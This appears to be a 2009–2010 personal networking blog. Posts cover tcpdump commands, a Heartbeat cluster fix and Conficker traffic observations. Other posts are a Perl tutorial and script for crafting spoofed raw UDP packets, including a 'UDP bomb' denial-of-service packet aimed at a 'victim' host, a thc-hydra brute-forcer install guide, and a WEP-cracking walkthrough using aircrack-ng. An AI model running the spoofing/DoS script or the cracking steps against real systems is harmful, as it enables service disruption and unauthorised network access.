This is for reference, its not a guide but just a list of usage commands that I picked from various sources. Yeah I admit, I am one of those lamers who prefer to google than reading the man page. :/ Most are picked from wireshark's homepage :

http://openmaniak.com/tcpdump.php

1.tcpdump
2.tcpdump -v //verbose
3.tcpdump -D //lists devices
4.tcpdump -n //avoid dns lookup
5.tcpdump -q // quick output
6.tcpdump udp // capture udp packets only :: useful
7.tcpdump -w capture.cap //save the capture to a file named capture.cap :: useful
8.tcpdump -r capture.cap //read dump from capture.cap
9.tcpdump host abc.com //packets coming from or going towards abc.com ::useful
10.tcpdump src xx.xx.xx.aa and dst xx.xx.xx.bb
11.tcpdump -A //displays the packet's content ::useful
12.tcpdump -i eth1 //capture on interface eth1
13.tcpdump -v -A udp and dst 192.168.69.238 or dst 192.168.69.242 -i eth1
14.tcpdump -n -S -s 15000 -vv -X 'host 192.168.0.159 and udp and port 1717'
-S print absolute IP sequence number (not relative)
-n no address resolution
-s size of capture for each packet (15000 should be enough to hold data returned by query,
you will have to play with this depending on what type of query you issue)
-X print HEX and ASCII version of packet 'host 192.168.0.159 and udp and port 1717'

for an exhaustive list, see the man page

http://linux.die.net/man/8/tcpdump

Exceeding Windows Remote Desktop Limit

2010-02-08T11:48:00.000+05:30

While making a Remote desktop connection, the maximum number of allowed connections is 2. And when this limit is reached, you see an error message of the sort:

When you close the remote desktop window using the 'x' sign in the top right corner, you DISCONNECT from the windows session. However windows keeps your session alive in its memory. So that when you try to relogin it assigns the active session in its memory to you. Closing the window using the 'x' button doesnot make you logoff. Your session remains active, only that your state is 'DISCONNECTED'. So sometimes when the number of sessions is 2, even though they are disconnected, still windows shows you this message. You can use a third reserved connection to remotely login into windows:

type this command in your command prompt:

start mstsc -v:xx.xx.xx.xx /f -console

and this will open the third connection. You can use this connection to kill the other disconnected sessions through taskmanager. xx.xx.xx.xx is the IP of the windows machine.

Failed to find VM - aborting Red Hat

2010-02-08T11:47:00.000+05:30

In case you are using RedHat 5.* Linux, and you a message like this while installation:

Failed to find VM - aborting

You need to disable Selinux.
Go to /etc/selinux directory, open the file config, which would look like:

# This file controls the state of SELinux on the system.
# SELINUX= can take one of these three values:
# enforcing - SELinux security policy is enforced.
# permissive - SELinux prints warnings instead of enforcing.
# disabled - SELinux is fully disabled.
SELINUX=disabled
# SELINUXTYPE= type of policy in use. Possible values are:
# targeted - Only targeted network daemons are protected.
# strict - Full SELinux protection.
SELINUXTYPE=targeted

Change the line SELINUX=enforcing to
SELINUX=disabled

Social Startups Business Models

2010-02-08T11:46:00.000+05:30

Conficker Network Traffic [ Wireshark Captures ]

2009-09-02T20:51:00.000+05:30

These are some of the network captures that I did using wireshark, when Conficker infected my machine. I had a hard time removing it. But in the beginning I didnt even know if something is wrong. I did some network forensic kind of thing just to ensure that some weird and unexplained network traffic was going on. :( . Now I am presenting them as facts and questions that came to my mind. Sometimes when you dont know if your computer is compromised by a worm or trojan, these kind of symptoms are the ones you can look out for. Wireshark is an excellent open source tool for monitoring the network traffic coming in and out of your system.

Fact #1: Use of p2p: the PSH flag set in TCP packets.
Q: p2p?? I aint using any p2p software, what the hell? why these PSH flags are set?

In general the TCP packets used by p2p (peer to peer) protocol have PSH (PUSH) flag set. Whenever you see PSH flag set in TCP packets. You can be almost sure of p2p in action. p2p is not a common protocol, it comes into picture only if you are using p2p softwares like Kaza lite etc. Otherwise it sure could be a cause of worry. The PSH flag set implies that the TCP packets are intended to be "push" across the buffers ahead of any other data. For this reason p2p traffic is notorious for eating up bandwidth and is generally banned in corporate networks. Also p2p isnt a very reliable means of obtaining things. You never know the benign executable (that came in disguise of your favorite game) could be a trojan or a bot. One click and your computer becomes the zombia of a botnet.

Fact #2: Whenever I connect to the network, my machine starts asking for MAC addresses of all possible hosts on my LAN.
Q: Why would anyone do that? There is something, and this is a common sign of a worm which is trying to scan the entire LAN for vulnerable hosts.

This is a sureshot sign of trouble. If your computer is searching the whole subnet (say 10.0.0,1 to 10.0.0.254), its trying to figure out who else is present on your LAN. If any host replies back, the worm will try to infect it. The netbios (port 135, 139, 445) services of a windows machine are available to the LAN only. Any worm outside the LAN cannot attack it. But if any machine in your LAN is infected, chances are that all vulnerable windows machines will get infected. Unless your antivirus and OS is updated to face the most recent vulnerabilities.

Fact #3: My machine trying to access unknown websites?? Oh, atleast they are unknown to me.
Q: why?? may be trying to get updates for the 'thing'?

Conficker uses an algorithm for calculating the rate of infection. If the rate is too fast, it would eat up the network bandwidth which may attract unwanted attention of network admins. If the rate is too slow, well conficker surely doesnt want this. Conficker tries to communicate some popular websites to find out the round-trip time and based on the results it tries to create a rate of infection that matches with internet speed of the victim host computer. I got this reasoning from the internet, possibly an antivirus site.

In other cases the worm might be trying to get updates for itself from hacking or compromised sites. The worm might be downloading the next instruction set, or even more powerful malware, adware etc.

Fact #4: Trying to get my IP address. :(
Q: This could be a trojan or a bot.

By finding and sending my IP address, a bad guy/cracker can try to gain remote access to my computer. Well I dont really think so, I aint that special. I am just another bot in the bot herder's army.

Fact #5:SMB negotiation, trying to gain anonymous access through port 445.
Q: Now I am sure this thing has something to do with a microsoft smb vulnerability, or may be its just trying something with anonymous shares.

Well, microsoft has its share of security problems. Whenever a remotely exploitable vulnerability appears, you can always expect a new worm coming in. No surprises here. This makes business happen, antiviruses get their acknowledgment. Advisories are out. And the bad guys make money too. Windows security gets another blow. And a lot of people lose money as well.

Fact #6: This was the last part, the hidden dll was in the form of a bmp image file hidden deep inside the caves of Internet Explorer.
Q: Why couldnt I find it myself?? huh!

Catching a popular worm without an antivirus is very hard these days. Although in my past I cleaned some of the relatively 'friendly' worms without using an antivirus at all. yeah they would let me sneak in ultimately give up their positions. Its fun and its like solving a puzzle.

High Availability Cluster using Heartbeat

2009-08-29T10:38:00.000+05:30

Recently the problem I was facing while using the heartbeat 2.1.4 package was that my slave wasnt taking over, after the fail over condition. When I saw the logs I saw that there were messages related to failure in starting the apache:

ResourceManager[1769]: 2009/08/27_06:57:37 info: Running /etc/ha.d/resource.d/apache start
apache[2212]: 2009/08/27_06:57:38 INFO: httpd2: Could not reliably determine the server's fully qualified domain name, using 192.168.69.209 for ServerName
apache[2212]: 2009/08/27_06:57:38 INFO: apache not running
apache[2212]: 2009/08/27_06:57:38 INFO: waiting for apache /etc/apache2/httpd.conf to come up
apache[2212]: 2009/08/27_06:57:39 ERROR: command failed: sh -c wget -O- -q -L --bind-address=127.0.0.1 http://localhost:80/server-status | tr '\012' ' ' | grep -Ei "[[:space:]]*" >/dev/null
apache[2201]: 2009/08/27_06:57:39 ERROR: Generic error
ResourceManager[1769]: 2009/08/27_06:57:39 ERROR: Return code 1 from /etc/ha.d/resource.d/apache
ResourceManager[1769]: 2009/08/27_06:57:39 CRIT: Giving up resources due to failure of apache
ResourceManager[1769]: 2009/08/27_06:57:39 info: Releasing resource group: node09 IPaddr::9.12.34.100 ldirectord apache
ResourceManager[1769]: 2009/08/27_06:57:39 info: Running /etc/ha.d/resource.d/apache stop
apache[2456]: 2009/08/27_06:57:41 INFO: Killing apache PID 2363
apache[2456]: 2009/08/27_06:57:41 INFO: apache stopped.
apache[2445]: 2009/08/27_06:57:41 INFO: Success
ResourceManager[1769]: 2009/08/27_06:57:41 info: Running /etc/ha.d/resource.d/ldirectord stop
ResourceManager[1769]: 2009/08/27_06:57:41 info: Running /etc/ha.d/resource.d/IPaddr 9.12.34.100 stop
IPaddr[2679]: 2009/08/27_06:57:41 INFO: ifconfig eth0:0 down
IPaddr[2662]: 2009/08/27_06:57:41 INFO: Success
heartbeat[1755]: 2009/08/27_06:57:41 info: local HA resource acquisition completed (standby).
heartbeat[1666]: 2009/08/27_06:57:41 info: Standby resource acquisition done [foreign].
heartbeat[1666]: 2009/08/27_06:57:41 info: Initial resource acquisition complete (auto_failback)
heartbeat[1666]: 2009/08/27_06:57:42 info: remote resource transition completed.
hb_standby[2751]: 2009/08/27_06:58:12 Going standby [foreign].
heartbeat[1666]: 2009/08/27_06:58:12 info: node09 wants to go standby [foreign]

After inspecting the apache, everything seemed to fine. Even the ha apache scripts could successfully start/stop the apache except for the unknown wget error:

apache[2212]: 2009/08/27_06:57:39 ERROR: command failed: sh -c wget -O- -q -L --bind-address=127.0.0.1 http://localhost:80/server-status | tr '\012' ' ' | grep -Ei "[[:space:]]*" >/dev/null

After some initial debugging by setting the debug option "set -x" in apache start script (/etc/ha.d/resource.d/apache), I found the script where the problem was occurring.

/usr/lib/ocf/resource.d//heartbeat/apache

It seems that even if the apache starts successfully, the script returns an error code because of the failure in the execution of command. In general, apache doesnt seem to have the server-status facility enabled by default. (and I dont know how and why should I enable it) So for the quick fix its better to comment the erroring command.

##ocf_run sh -c "$WGET $WGETOPTS $STATUSURL | tr '\012' ' ' | grep -Ei \"$TESTREGEX\" >/dev/null"

I still dont understand the reason when ha should give up the network resources just because a service failed to start. It mught be a bug though, I never faced such a problem in former ha versions. In those times the apache scripts used to be very simple.

LInks:
http://www.linux-ha.org/

Converting Youtube flv files to MP3

2009-08-19T16:26:00.000+05:30

OK, this one is a quickie. Just thought about sharing this. How many times you liked the background soundtrack being played in a youtube video. I bet you also felt like saving the video or bookmarking it only because you liked the soundtrack (who cares about the video). Yeah in today's small world its possible that while watching a video created by a Brazilian hacker you actually liked their song. I remember while watching a Sanath Jayasuria video I liked a Srilankan song so much that I actually searched for it. Alas, I could never understand the local lyrics , and so the search was tougher. oops deviating too much from the actual topic. Short and simple, if you want to extract the soundtrack from an flv file, you can use a tool called Super. You can use it for extracting the soundtrack from the video and saving it as an MP3 file that can be later played on your ipod.

And if you are still looking something for downloading a youtube video, then get DownloadHelper addon for mozilla. In short DownloadHelper helps you download any video on a web page for which you dont see an explicit link. Or as its best written ijn their description "The easy way to download and convert Web videos from hundreds of YouTube-like sites."

Here is a pic of Super in action, just start Super, drag your flv file on it, and you will find the mp3 in the output folder of install location of Super.(Typically Program Files/erightsoft)

Links below:
Super:
http://www.erightsoft.com/SUPER.html

DownLoad Helper:
https://addons.mozilla.org/en-US/firefox/addon/3006

Creating a UDP Packet/IP Spoofing through PERL

2009-08-15T12:07:00.000+05:30

Introduction
***************
For the past few days I was trying to create a program which could generate continous UDP traffic for me. And since I am reading about perl these days, I thought why shouldnt I try my luck on perl. And yes, I found it to be very easy and simple to understand plus it was great fun. Well, frankly speaking generating UDP traffic isnt a very big deal. You can google about it and you will find loads of results. But I went one step further, in fact the udp traffic generator didnt solve my problem. I wanted to create a UDP datagram, where I could tweak the UDP header values and change them to what I wanted. Normal socket calls in perl dont allow you to tweak the actual header fields. So I searched on the internet on how I could create a raw packet through perl. I came across two such links which gave me clues, first its a module named Net Packet in perl, which allows you to create packets.

http://search.cpan.org/~gomor/Net-Packet/

second a perl script created by a guy named 'cleen' which creates RAW TCP/IP packet.

http://www.perlmonks.org/index.pl?node_id=17576&lastnode_id=63535

Well, for my this script I mainly followed cleen's tutorial, and I crafted my own UDP packet. The only problem is that I am still learning how to make things happen in perl, and so I try to keep things as simple as I can, which even means no functions or subroutines and minimum use of perl modules like Net Packet. :( So here we go, the steps should be helpful to anyone who wants learn how to create raw udp packets (or even any other, for TCP/IP you can follow the link for cleen's tute), I would explain the basics and the knowledge that you must have.

Requirements
******************
1. Obviously you need perl installation. :D
2. You must understand the header format for IP and UDP, i.e. the fields in these headers and their length in bits/bytes. I have listed the links at the bottom for reference. Yeah reading them is worth it. :)
3. Knowledge of perl function "pack" and how to send/recieve data using sockets in perl (trivial :))
4. Brief idea of tcpdump or wireshark, this is helpful for debugging, if you mess something in your packet.

Setup
********
The setup consists of two machines:

Machine A: Attack machine. (Linux)
Machine B: Victim machine. (Linux)

I will run my script from machine A, the script will generate and send a UDP packet to machine B. A wireshark or Tcpdump will be running on Machine B, (and on Machine A as well) which will capture the UDP packet. A wireshark/tcpdump on victim machine B will ensure that our UDP packet reached successfully. If your UDP packet isnt formed correctly (bad use of pack function or any missing header field) then machine A will not send it to the victim machine. Thats where the wireshark/tcpdump on Machine A will show you the wrongly made packet. In this way you can ensure from machine A tcpdump, that you constructed the UDP packet correctly. Dont worry too much if you dont understand the above shit, you will learn it in the later part of the tutorial.

Creating the UDP Header
******************************
First we create a UDP header. The UDP header and data consists of 5 fields. Source port, Destination port, length of the UDP packet, Checksum and the UDP data that you are going to send. For details of a UDP packet header fields, read some stuff from here:

http://www.networksorcery.com/enp/protocol/udp.htm

I havent used the udp checksum part, as I didnt need it for my test. My source port is 33333 and my destination port is 7. You can choose any source port above 1024, and for the destination port, the udp echo service runs on port 7. You can use any other destination port as well. But its necessary to use a port which is running a udp service, like echo or chargen. Because only then the vulnerable linux will process our UDP packet. For this service you may need to enable it manually, as its disabled by default. Just go to the /etc/xinetd.d directory of the victim machine B and look for the file named echo-dgram or echo-udp. Open it and change the line "disable = yes" to "disable = no". The restart the xinetd daemon by the command:

service xinetd stop
service xinetd start

This would enable your echo service on udp port 7. Check it by netstat output:

[root@ip9-12-34-239 xinetd.d]# netstat -an | grep udp
udp 0 0 0.0.0.0:7 0.0.0.0:*

The third field is the udp length field. Since our packet contains 4 fields (src port, dest port, length and checksum) that are each 16 bit (2 bytes) wide and a data field that could be anything, the udp length would be minimum 8 bytes and for a data like "TEST" it would be 8 + 4 = 12 bytes. Thats it, our udp packet is ready (oh I mean we have ignored the checksum calculation, and we are making it zero for this test)

$src_port = 33333;
$dest_port = 7;
$len = 12;
$cksum = 0;
$data = "TEST";

Creating the IP Header
*****************************
The next part is the IP part (IP header). Read about the IP header and its fields and respective field lengths here:

http://www.networksorcery.com/enp/protocol/ip.htm

The IP part I have taken from cleen's code. Credits to him as I couldnt find any other tute on creating and formatting (use of pack here) the Ip header. Just understand the importance of each field, there is not much to change here except the checksum part, the ip total length, and the underlying protocol code.The checksum is set to zero. Dont worry about the ip checksum as it would be calculated by the kernel. The IP total length is the length of IP header (which is 20 bytes + the UDP part which is 12 bytes = 32 bytes). The underlying protocol in our case is udp, which has the code of 17. Alternatively you can use the function getprotobyname to generate the protocol code.

my $ip_ver = 4;
my $ip_len = 5;
my $ip_ver_len = $ip_ver . $ip_len;
my $ip_tos = 00;
my ($ip_tot_len) = $udp_len + 20;
my $ = 19245;
my $ip_frag_flag = "010";
my $ip_frag_oset = "0000000000000";
my $ip_fl_fr = $ip_frag_flag . $ip_frag_oset;
my $ip_ttl = 30;

Formatting the packet using pack function ****************************************** ********* Once the header fields are set, we can use pack function to create the packet in binary format. For the details you may need to undertsand the pack function and the order of header field formats as specified in the RFCs. You can see the pack function manual in the links section provided at the bottom. The pack function takes a template as its first argument and the data to be formatted as its next arguments.
The function pack('H2H2nnB16C2na4a4nnnna*', $ip_ver_len,$ip_tos,$ip_tot_len,$ip_frag_id, $ip_fl_fr,$ip_ttl,$udp_proto,$zero_cksum,$src_host, $dst_host,$src_port,$dest_port,$len, $cksum, $data); packs the fields as follows:

H2: A hex string (high nybble first) =>Sets the ip_ver_len (Ip version and Internet header length field)

H2: A hex string (high nybble first) => Sets the ip_tos (Type of service)
n: An unsigned short (16-bit) in "network" (big-endian) order. => ip_frag_id (16 bit fragment ID number)

n: An unsigned short (16-bit) in "network" (big-endian) order. => ip_fl_fr (Fragmentation flags and fragment offset)

B16: A bit string (descending bit order inside each byte).=> ip_ttl (Time to live)

C2: An unsigned char (octet) value. => udp_proto (UDP protocol ID)

n: An unsigned short (16-bit) => zero_cksum (Header checksum, to be calculated by the kernel)

a4: A string with arbitrary binary data, will be null padded. => src_host(Source IP)

a4: => dst_host (Destination IP)

n => src_port (Source port)
n => dest_port (Destination port)
n => len (length of UDP part)
n => cksum (checksum of udp part)
a* => data (UDP DATA)

The pack function returns you a formatted packet which you can send across.
In case you try to modify the pack function template, its possible that the bits are not set as required,
in such case your packet will not be forwarded by Machine A. However you can see the bad packet by running a
tcpdump on Machine A. If you use the template as say:

For eg.
CCnnnCCna4a4a*nnna* (which I tried unsuccessfully)
you will get a packet which upon a tcpdump capture looks like this:
The wireshark could not identify the fields that we set, which itself means the packet wasnot formatted correctly.
Even you can see the IP version number is set as 2, which is not what we set before ($ip_ver = 4). Such bad packets
are never forwarded, and so you will not see them in the tcpdump capture of the victim machine B.

After formatting the packet using the template "H2H2nnB16C2na4a4nnnna*", we see a packet capture as:

Here, the wireshark correctly identifies every field and the packet is captured on the victim machine B as well. Which means that our UDP packet reached its destination. You can also see the echo data that we sent, TEST.

Creating a Simple exploit
*******************************
Have you heard about the UDP bomb attack? Its a very old attack, and in todays date, kindof ineffective, only some very old Sun systems could be vulnerable to this. But its great for testing the efficiency of security programs say your firewall. Well, this attack sends a malformed UDP packet to the victim machine. And if the victim machine is vulnerable, this could crash the machine, resulting in a Denial of Service attack. You wonder what we change in the UDP packet? Remember the len variable that we used, the len variable carries the length of the UDP part. That is the length of the header fields and the length of the data part. The total length of UDP header part is 8 bytes (4 bytes, 2 each for src and dest port and 8 bytes for checksum and udp length field). A very obvious fact is that even for a blank UDP packet (whose data part is zero) the UDP length would still be 8 bytes. i.e minimum possible udp length could be 8 bytes. But what if we change the udp length to something less than 8? If the victim machine does not verify the length of the UDP length field, it may crash. And this is what happens when you send the invalid udp packet to a vulnerable victim machine. so for creating a udp bomb attack, just make the len part to something less than 8, say 3. Let the total length in the IP field have the correct value, or else there is a chance that your IP header becomes invalid and some forwarding router drops it. Thats it, your test script is ready.

Links:
********
Net Packet
http://search.cpan.org/~gomor/Net-Packet/

A nice C program for learning how to create a raw UDP packet
http://insecure.org/sploits/inetd.internal_udp_ports.DOS.attack.html

IP Header
http://www.freesoft.org/CIE/Course/Section3/7.htm
http://www.networksorcery.com/enp/protocol/ip.htm

UDP Header
http://www.networksorcery.com/enp/protocol/udp.htm

Pack function
http://perldoc.perl.org/functions/pack.html

Creating a RAW TCP/IP packet
http://www.perlmonks.org/index.pl?node_id=17576&lastnode_id=63535

UDP Bomb attack
http://xforce.iss.net/xforce/xfdb/143

##########################################
###########Source for educational purpose############

#!/usr/bin/perl
use Socket;
$src_host = $ARGV[0];
$dst_host = $ARGV[1];
$src_port = 33333;
$dest_port = 7;
$len = 3; #$len is the udp packet length in the udp header. Must Not be less than 8, for udp bomb attack make it less than 8 ...say 3..lol ;)
$cksum = 0;
$data = "TEST";
$udp_len = 12; #8+TEST
$udp_proto = 17; #17 is the code for udp, alternatively, you can getprotobyname.
if(!defined $src_host or !defined $src_port or !defined $dst_host or !defined!dest_port)
{
print "##### Script to send a UDP packet, src port is 33333 and Dest port is 7 (echo). To change these, make changes in the script. #####\n";

print "\nUsage: perl $0 \n";

print "Eg. perl $0 9.12.34.237 9.12.34.239\n";

print "9.12.34.237 => Attack Machine\n";

print "9.12.34.239 => Victim Machine\n";

exit;

}

#Prepare the udp packet, not required, we arent calculating the checksum ;)

#$udp_packet = pack("nnnna*", $src_port,$dest_port,$len, $cksum, $data);

$zero_cksum = 0;
my $dst_host = (gethostbyname($dst_host))[4];
my $src_host = (gethostbyname($src_host))[4];

# Now lets construct the IP packet

my $ip_ver = 4;
my $ip_len = 5;
my $ip_ver_len = $ip_ver . $ip_len;
my $ip_tos = 00;
my ($ip_tot_len) = $udp_len + 20;
my $ip_frag_id = 19245;
my $ip_frag_flag = "010";
my $ip_frag_oset = "0000000000000";
my $ip_fl_fr = $ip_frag_flag . $ip_frag_oset;
my $ip_ttl = 30;

#H2H2nnB16C2na4a4 for the IP Header part
#nnnna* for the UDP Header part.
#To undertsand these, see the manual of pack function and IP and UDP Header formats
#IP checksum ($zero_cksum is calculated by the kernel. Dont worry about it.)

my ($pkt) = pack('H2H2nnB16C2na4a4nnnna*',
$ip_ver_len,$ip_tos,$ip_tot_len,$ip_frag_id,
$ip_fl_fr,$ip_ttl,$udp_proto,$zero_cksum,$src_host,
$dst_host,$src_port,$dest_port,$len, $cksum, $data);

socket(RAW, AF_INET, SOCK_RAW, 255) || die $!;
setsockopt(RAW, 0, 1, 1);
my ($destination) = pack('Sna4x8', AF_INET, $dest_port, $dst_host);
send(RAW,$pkt,0,$destination);

###########Ends here#####################
######################################

Finally Tcpdump

2009-07-28T09:10:00.000+05:30

Although I like wireshark the most, but there are times when you have to use tcpdump. Anyways if I need any colorful troubleshooting I generally save the tcpdump capture in a pcap file, and later view it in wireshark.

This is for reference, its not a guide but just a list of usage commands that I picked from various sources. Yeah I admit, I am one of those lamers who prefer to google than reading the man page. :/ Most are picked from wireshark's homepage :

http://openmaniak.com/tcpdump.php

1.tcpdump
2.tcpdump -v //verbose
3.tcpdump -D //lists devices
4.tcpdump -n //avoid dns lookup
5.tcpdump -q // quick output
6.tcpdump udp // capture udp packets only :: useful
7.tcpdump -w capture.cap //save the capture to a file named capture.cap :: useful
8.tcpdump -r capture.cap //read dump from capture.cap
9.tcpdump host abc.com //packets coming from or going towards abc.com ::useful
10.tcpdump src xx.xx.xx.aa and dst xx.xx.xx.bb
11.tcpdump -A //displays the packet's content ::useful
12.tcpdump -i eth1 //capture on interface eth1
13.tcpdump -v -A udp and dst 192.168.69.238 or dst 192.168.69.242 -i eth1
14.tcpdump -n -S -s 15000 -vv -X 'host 192.168.0.159 and udp and port 1717'
-S print absolute IP sequence number (not relative)
-n no address resolution
-s size of capture for each packet (15000 should be enough to hold data returned by query,
you will have to play with this depending on what type of query you issue)
-X print HEX and ASCII version of packet 'host 192.168.0.159 and udp and port 1717'

for an exhaustive list, see the man page

http://linux.die.net/man/8/tcpdump

Eg.

tcpdump -v -A udp and dst 192.168.69.238 or dst 192.168.69.242 -i eth1
tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes
03:25:40.691905 IP (tos 0x0, ttl 64, id 23436, offset 0, flags [DF], proto UDP (17), length 40) node242.39738 > 192.168.69.238.chargen: UDP, length 12
E..([.@.@.....E...E..:.....XHello World!
03:25:40.692592 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 1052) 192.168.69.238.chargen > node242.39738: UDP, length 1024
E.....@.@.)...E...E....:....FGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxy

tcpdump -n -S -s 15000 -vv -X 'host 192.168.0.159 and udp and port 1717'

09:41:54.262946 IP (tos 0x0, ttl 255, id 28832, offset 0, flags [DF], length: 46) 192.168.0.159.33365 > 69.25.16.47.1717: [udp sum ok] UDP, length: 18
0x0000: 4500 002e 70a0 4000 ff11 e2f6 c0a8 009f E...p.@.........
0x0010: 4519 102f 8255 06b5 001a 8e36 fefd 004e E../.U.....6...N
0x0020: bf06 01ff ffff 0000 0000 0000 0000 ..............

getch in Linux

2009-07-28T09:01:00.000+05:30

In case you ever need to use getch() function in gcc on Linux, use the following quick fix code:



   #include <stdio.h>

   #include <termios.h>
   #include <unistd.h>
 
        int getch(){
            struct termios oldt,
                           newt;
            int ch;
            tcgetattr( STDIN_FILENO, &oldt );
            newt = oldt;
            newt.c_lflag &= ~( ICANON | ECHO );
            tcsetattr( STDIN_FILENO, TCSANOW, &newt );
            ch = getchar();
            tcsetattr( STDIN_FILENO, TCSANOW, &oldt );
 
            return ch;
        }

2009-05-04T19:46:00.000+05:30

Installing thc-hydra on Ubuntu 8.10 Intrepid Ibex
********************************************************************

I had a hard time making hydra work on my Intrepid. And I wanted to write this post because while googling I found a lot of people facing similar errors. Especially making the GUI work on Ubuntu. I have provided the links from where I got clues. THis includes making minor change in the code as well.(thanks to the author Mark who provided this info)

For those who are unaware of hydra, thc-hydra is a brute forcing tool used by penetration testers to check the security of their network. Hydra lets you create an attack on network services like ftp, telnet, http, smb and many more but most importantly ssh. Its a wonderful tool to analyse the security of your network.

I would only mention the errors that are faced in general. If you face some more errors then you may have to install additional packages depending on your configuration.

Theory

1.Download hydra source from here
http://freeworld.thc.org/thc-hydra/

2. You will need libgtk2.0-dev, if you want hydra GUI. Install it using apt-get

apt-get install libgtk2.0-dev

3. If you want ssh support (I bet you badly want it ;)) then download the library from here: http://0xbadc0de.be/libssh/libssh-0.2.tgz

For more details:
http://0xbadc0de.be

This may save you from the frustrating ssh errors that I saw after installing libssh 0.11 and through the default installation from the repository. (apt-get install libssh-dev)

This is when I read in the hydra messages that I need to install libssh0.11 from 0xbadc0de.be.
I faced this error (Error 1) when I tried installation after libssh 0.11 install. Somewhere I read that it has to do with symbolic links. But the libraries seemed to be at their right place. These errors vanish when you use libssh-dev from apt-get or libssh 0.2 from 0xbadc0de.be. I would recommend the latter one.

Error 1:
hydra error while loading shared libraries: libssh.so: cannot open shared object file: No such file or directory

I faced Error 2 when I installed libssh-dev from apt-get. May be it has something to do with the version. You dont see these errors when you install libssh0.2 from 0xbadc0de.be

Error 2:
hydra-ssh2.o: In function `start_ssh2':
hydra-ssh2.c:(.text+0x57): undefined reference to `options_new'
hydra-ssh2.c:(.text+0xaf): undefined reference to `options_set_wanted_method'
hydra-ssh2.c:(.text+0xc1): undefined reference to `options_set_wanted_method'
hydra-ssh2.c:(.text+0xcc): undefined reference to `options_set_port'
hydra-ssh2.c:(.text+0xd7): undefined reference to `options_set_host'
hydra-ssh2.c:(.text+0xe2): undefined reference to `options_set_username'
hydra-ssh2.c:(.text+0x12e): undefined reference to `ssh_error_code'
collect2: ld returned 1 exit status

Once you install libssh 0.2, you also need to download a patch provided by the author to make hydra 5.4 work with libssh 0.2. (This is much simpler and works like a charm :))

Get the patch from here:

http://0xbadc0de.be/libssh/hydra-libssh0.2.patch

4. OK, another problem that you may face (for sure) is that your GUI part (hydra-gtk) wont compile. Sort of:

/usr/include/bits/fcntl2.h:51: error: call to "__open_missing_mode" declared with attribute error: open with O_CREAT in second argument needs 3 arguments

Check out this link for details (needs minor tweak in code, and it worked for me. The errors vanished.):
http://www.hacktoolrepository.com/tool.pl?tid=37

5. This error/solution is displayed during hydra install, but anyways I am mentioning it: "cannot find -lpq"

run those commands:
make clean
./configure

Edit Makefile and and remove the "-lpq" and "-DLIBPOSTGRES" statements.

XDEFINES= -DLIBOPENSSL -DLIBPOSTGRES -DLIBSSH
XLIBS= -lssl -lpq -lssh -lcrypto

to

XDEFINES= -DLIBOPENSSL -DLIBSSH
XLIBS= -lssl -lssh -lcrypto

then,
make
make install

Installation Summary.

1. Download and extract thc-hydra source :

wget http://freeworld.thc.org/releases/hydra-5.4-src.tar.gz

tar -xvzf hydra-5.4-src.tar.gz

2. Download libssh0.2 and the patch:

wget http://0xbadc0de.be/libssh/libssh-0.2.tgz

wget http://0xbadc0de.be/libssh/hydra-libssh0.2.patch

3. Install libssh0.2:

tar -xvzf libssh-0.2.tgz
cd libssh-0.2
./configure
make
make install

4. Change directory to hydra source and apply the patch:

cd hydra-5.4-src
patch -p1 < /path/to/hydra-libssh0.2.patch

5. Install hydra (in case you dont get -lpq error or the gtk compile error, else edit the Makefile, or edit the hydra-gtk/src/callbacks.c code respectively)

./configure
make
make install

Run hydra command line by "hydra" or hydra GUI by "xhydra".

Happy Learning!!!

2009-04-30T08:06:00.000+05:30

How I broke my wifi (WEP) Encryption
*********************************************************
Hey Guys. Last time I worked on figuring out how packet injection works on Ubuntu Intrepid. However even after my best efforts I could not increase the data capture through packet injection. Well packet injection works, but still I am unable to move any further. The fake authentication works until the authentication step, but it fails at the association. Replaying a packet again doesnt work. Didnt try the other techniques. I wasnt pretty sure if was following it correctly. But this weekend many of friends came for a gaming night. As they used the same wifi network, an overwhelming amount of traffic was generated. I captured some 700000 packets, and broke the passcode with some 5 secs of aircrack run. At least I am confident now that it works on my box. Only need to learn the packet injection technique. I will narrate down the steps:

I did this purposely to learn the basics of wifi security, and that too on my own test network. I purposely chose a weak password for the testing. If you are trying to intrude a wifi network which doesnot belong to you, then you could land yourself in serious legal trouble, unless you have a written permission from the owner to do so and you are doing it for ethical reasons. This guide or the author are not responsible for the destructive actions you take. Technology is for the betterment and ease of lives. Dont misuse it. This article serves as a guide for learning the commonly used security tools for wifi auditing. Use at your own risk.

Open a shell as root

1. Start airmon-ng to bring your wireless interface in monitoring mode.

airmon-ng start wlan0

This will add an interface mon0 which will be in monitor mode. I didnt specify the channel though.

2. Start capturing the packets of your home network

airodump-ng -c 1 --bssid 00:1E:40:xx:B1:xx -w home305 mon0

00:1E:40:xx:B1:xx is the mac address of my wireless router, and home305 is the name of my network. You can get this info by kismet or even your normal wifi explorer. For other options see the man page of airodump-ng
Below is the scene when I was capturing packets:

The first red box on top left is the number of data packets that we captured. The second one on top right is the rate.. Any rate above 100 is excellent. Around 50 is ok. It means you are capturing 100 useful packets per second. By this rate you can estimate how long it will take to capture some 1000000 data packets (I think this should be good enough for a 128 bit encryption, I am not sure some say it should be 3000000). Some say you need atleast 300000 packets for a 64 bit encryption scheme. Oops, if this sounds a little techie then in simpler terms: If you set your password as 5 char length then you should capture some 300000 or more packets (depends on the password strength of your network) If you set your password as 13 char length then you should capture some 100000 or more packets (depends on the password strength of your network) Well, this is not a fact, just my own estimate and as you know, I am no expert at this. My own password was "password12345" and I think it should have required much less than what I was expecting. In fact I had captured some 700000 packets and it worked like a charm for me. I have no experience as to how the password stength will affect the minimum number of packets required. That would be interesting stuff. The third red box contains the table of clients connected. We all were playing games.

3. Optionally you can try injection techniques to increase the rate of packet capture. But as I said earliar, my injections failed miserably. May be as of now I am not that good in judging packets. And also injection techniques may or may not work depending on the wireless router. I didnt researched this either :( So still not sure why it doesnt work for me.

4. When you feel you have captured suffiecient amount of packets, you can stop capturing. I captured some 700000 packets. You will find a file (in the same directory from where you ran airodump-ng) containing the captured data with the name of your network. On this file you can need to run aircrack.

aircrack-ng -a 1 -c -n 128 home305-01.cap

I already know that my encryption is 128 bit. So I used the option -n 128 to save time. The following screen capture is the result of the exercise. My password (password12345) was so lame that it got broken within 5 secs of aircrack run.

